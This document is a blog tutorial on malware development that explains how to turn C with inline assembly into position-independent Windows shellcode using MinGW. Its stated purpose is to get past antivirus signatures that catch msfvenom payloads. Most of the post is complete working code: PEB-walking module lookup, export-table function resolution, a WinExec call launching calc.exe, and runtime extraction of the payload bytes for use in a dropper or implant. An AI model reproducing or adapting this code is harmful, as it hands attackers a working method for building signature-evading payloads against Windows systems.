From C, with inline assembly, to shellcode

Friday, August 11, 2023

PreviousAdvanced String Obfuscation NextThnks4RWX

Last updated 1 year ago

From C, with inline assembly, to shellcode

Friday, August 11, 2023

Part One: Introduction

One of the most important concepts in malware development is the concept of Position-Independent-Code (PIC). PIC, sometimes interchangeably referred to as shellcode, is a set of assembly instructions that can execute without being loaded by Windows as a complete executable. You’re probably most familiar with shellcode generated by msfvenom that looks something like the screenshot below.

However, because msfvenom payloads are so signatured, the ability to quickly generate these payloads is severely limited by antivirus detections on pretty much any environment.

There are a few ways to generate custom shellcode. Most commonly, programming your shellcode in raw assembly makes the development process technically difficult but provides very granular control over the behavior of your shellcode. This has been done for a very long time, so there are many good examples on how to get started online.

Alternatively, shellcode can be carefully crafted in C to provide a simpler interface for developers, as discussed in mattifestation’s original writeup linked at the bottom of this article. This method requires fairly extensive customization of compiler and linker options, and there’s reduced fidelity of control on the output shellcode.

In 2021, hasherezade developed a method of developing shellcode that combined the two above methods. Through some intermediate manipulations, the MSVC compiler could be used to generate shellcode from C in a process reminiscent of mattifestation’s method but with increased control. The downside of this method was that shellcode extraction occurred using some 3rd-party tool or script. Additionally, the shellcode sizes of this method are fairly large, almost 2kb in my testing.

In this writeup, we’ll be demonstrating a novel method of shellcode development that’s similar to Hasherezade’s method. Instead of using MSVC, we’ll use MinGW to compile some position-independent C code with optimizations and extract our shellcode at runtime. Our method differs from existing methods because our optimization options will be very simple, and the output shellcode will be comparable in size to shellcode generated by msfvenom.

Part Two: Getting Started

The first thing we need to understand to get a working shellcode, is that the code we develop cannot reference any WinAPI functions, at least not at first. In a typical C/C++ implementation, you would see something like this:

PVOID pWinExec = GetProcAddress(GetModuleHandle(“kernel32”), “WinExec”);

Thankfully, there’s a pretty robust set of public research available on implementing custom versions of GetProcAddress and GetModuleHandle. But it’s important that when we implement these in our code, we tell the compiler to inline our code as much as possible. This option is important so that our shellcode will all be located in a single snippet, rather than being implemented across several function calls.

Your custom GetProcAddress and GetModuleHandle should look something like this:

There’s one more code snippet that’s worth talking about at this point. Inside of our custom GetModuleHandle, there’s a call to “mem_cmp” which is a custom implementation of the C runtime (CRT) function “memcmp”. This implementation uses that in lieu of “strcmp” or “memcmp” so that our code can retain position independence.

This is the implementation that I used:

Once again, note the “inline” attributes in the declaration.

Part Three: Diving In

Now that we’ve created the necessary code snippets, let's talk about what the primary code logic ought to look like.

Line 8 contains the typedef of WinExec, which we’ll be using to execute calc.exe.

Lines 10-12 contain the function prototypes for the function we wrote in the previous section.

Lines 16-17 have pvStart/EndAddress which we’ll be using later to extract our shellcode.

Line 19 is an inline assembly label “StartAddress” which we can later use to get the starting address of our shellcode. Lines 22-24 align the stack and allocate stack space. Like previous iterations of code C to Shellcode methods this is a necessary step to provide our shellcode stack space for our variables.

Lines 27-31 are our local variables that store the strings we’ll need to find WinExec and pop calc.

Line 34 creates the function pointer to WinExec.

Line 35 calls WinExec will our calc.exe argument.

Conventional approaches to shellcode development in C would stop somewhere around here. But by using inline assembly, we can take our shellcode development a step further and extract our shellcode at run time. Let us look at one way to do that.

Line 38 resets the stack pointer to its value prior to our shellcode execution on line 24.

Line 39 creates an inline assembly label “EndAddress” that marks the end of our shellcode block.

Lines 41-43 extracts the start address of our shellcode and stores it in the pvStartAddress variable.

Line 45-47 extracts the end address of our shellcode and stores it in the pvEndAddress variable.

Lines 52-61 print the contents of our program between pvStartAddress and pvEndAddress.

If we compile our program without any optimizations, we’ll see the following:

At first glance it looks like it worked, but there’s a couple of things that don’t add up. Firstly, this payload is huge. Our second hint that something is wrong is that our payload fails if we test it inside a standard dropper template.

If we run our implant.exe with our custom shellcode embedded inside a debugger, we see that there’s a call to memcpy (placed by the compiler) inside of what’s supposed to be our position-independent code!

We can fix this issue by compiling our code with the -O option. Now if we execute our program we’ll see the following:

Part Four: The Code


// main.c
// x86_64-w64-mingw32-gcc main.c -O -masm=intel -o msg_shellcode.exe -Wno-int-conversion

#include <windows.h>
#include <stdio.h>
#include "Structs.h" // Extract necessary structures from https://github.com/mrexodia/phnt-single-header

typedef UINT(WINAPI *WinExec_t)(LPCSTR lpCmdLine, UINT uCmdShow);

INT mem_cmp (CONST VOID* str1, CONST VOID* str2, SIZE_T n);
HANDLE LocalGetModuleHandle (CONST CHAR* sModuleName);
PVOID LocalGetProcAddress(HANDLE pBase, CONST CHAR* sFuncName);

INT main(){
	
	PVOID pvStartAddress = NULL;
	PVOID pvEndAddress = NULL;
	
        __asm("StartAddress:;");
	
	//Align the stack
	__asm("and rsp, 0xfffffffffffffff0;"
		  "mov rbp, rsp;"
		  "sub rsp, 0x200" // allocate stack space, arbitrary size...depends on payload
	);
	
	CHAR sKernel32[] = "KERNEL32\0";

	CHAR sWinExec[] = "WinExec\0";
	
	CHAR sCalcExe[] = "calc.exe\0";
	
    
	WinExec_t pWinExec = (WinExec_t) LocalGetProcAddress(LocalGetModuleHandle(sKernel32), sWinExec);
	pWinExec(sCalcExe, 0);
	
	// Print the shellcode
	__asm("add rsp, 0x200;"); // Cleanup stack
	__asm("EndAddress:;");
	
	__asm("lea %0, [rip+StartAddress];"
	:"=r"(pvStartAddress)
	);
	
	__asm("lea %0, [rip+EndAddress];"
	:"=r"(pvEndAddress)
	);

	printf("Start address: %p\n", pvStartAddress);
	printf("End address: %p\n", pvEndAddress);
	
    CONST UCHAR* pStart = (CONST UCHAR*)pvStartAddress;
    CONST UCHAR* pEnd = (CONST UCHAR*)pvEndAddress;

	printf("UCHAR payload[] = {");
    while (pStart < (pEnd-1)) {
        printf("0x%02x,", *pStart);
        pStart++;
    }
	printf("0x%02x", *pStart);
	printf("};\n");

	
    return 0;
}

inline __attribute__((always_inline)) HANDLE LocalGetModuleHandle (CONST CHAR* sModuleName) {
	
	PPEB pPeb = NULL;
	HANDLE pBase = NULL;
	
	// PEB
    __asm("mov %0, gs:[0x60];"
    :"=r"(pPeb)
    );

    // Getting the Ldr
    PPEB_LDR_DATA pLdr = (PPEB_LDR_DATA)(pPeb->Ldr);
	
	// Getting the first element in the linked list which contains information about the first module
	PLDR_DATA_TABLE_ENTRY	pDte	= (PLDR_DATA_TABLE_ENTRY)(pLdr->InMemoryOrderModuleList.Flink);
	
	while (pDte) {    
		// If not null
		if (pDte->FullDllName.Length != (USHORT) 0x0) {

			// Check if both equal
			if (mem_cmp(pDte->FullDllName.Buffer, sModuleName, 0x1) == 0) {
				
				// Found sModuleName
				pBase = (HMODULE)(pDte->InInitializationOrderLinks.Flink);
				
				return pBase;
				

			}

		} else {
			break;
		}
		
		// Next element in the linked list
		pDte = *(PLDR_DATA_TABLE_ENTRY*)(pDte);

	}
	
	return NULL;
}

inline __attribute__((always_inline)) PVOID LocalGetProcAddress(HANDLE pBase, CONST CHAR* sFuncName){
	
	// Getting the dos header and doing a signature check
	PIMAGE_DOS_HEADER	pImgDosHdr		= (PIMAGE_DOS_HEADER)pBase;

	// Getting the nt headers and doing a signature check
	PIMAGE_NT_HEADERS	pImgNtHdrs		= (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);

	// Getting the optional header
	IMAGE_OPTIONAL_HEADER	ImgOptHdr	= pImgNtHdrs->OptionalHeader;

	// Getting the image export table
	PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY) (pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	// Getting the function's names array pointer
	PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);

	// Getting the function's addresses array pointer
	PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);

	// Getting the function's ordinal array pointer
	PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);


	// Looping through all the exported functions
	for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++){

	// Getting the name of the function
	CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);

	// Getting the address of the function through its ordinal
	PVOID pFunctionAddress	= (PVOID)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);

		// Searching for the function specified
		if (mem_cmp(sFuncName, pFunctionName, 0x7) == 0){
			return pFunctionAddress;		
		}
	}
	
	return NULL;
	
}

inline __attribute__((always_inline)) INT mem_cmp (CONST VOID* str1, CONST VOID* str2, SIZE_T n) {
    CONST UCHAR* s1 = (CONST UCHAR*)str1;
    CONST UCHAR* s2 = (CONST UCHAR*)str2;

    while (n--)
    {
        if (*s1 != *s2)
            return *s1 - *s2;
        s1++;
        s2++;
    }
    return 0;
}

Part Five: The Results

We can test our code above by putting our shellcode in a generic dropper template.

Note that our shellcode is only 286 bytes in size, compared to the MSFVenom 276 byte payload that we saw at the beginning of this article.

Part Six: Conclusion

In this writeup, we discussed a methodology to generate shellcode in a streamlined manner without over-complicated compiler options. The method we discussed relies on using MinGW, custom GetProcAddress and GetModuleHandle implementations, and a few optimizations to generate our shellcode. It’s important to note that our this method relies on using the “-O” or “-O1” options in MinGW. Other optimization settings implement other shortcuts that will break our shellcode’s position independence in favor of other optimization metrics in the output .exe.

This method provides us with an easy-to-use development workflow for custom shellcode generation. And because we’re using the MinGW compiler, we retain the ability to achieve granular control of our shellcode. With many benefits and only a few drawbacks, this method is my second preferred method of custom shellcode generation (after writing raw assembly ofc).

References

https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf

PreviousAdvanced String Obfuscation NextThnks4RWX

Last updated 1 year ago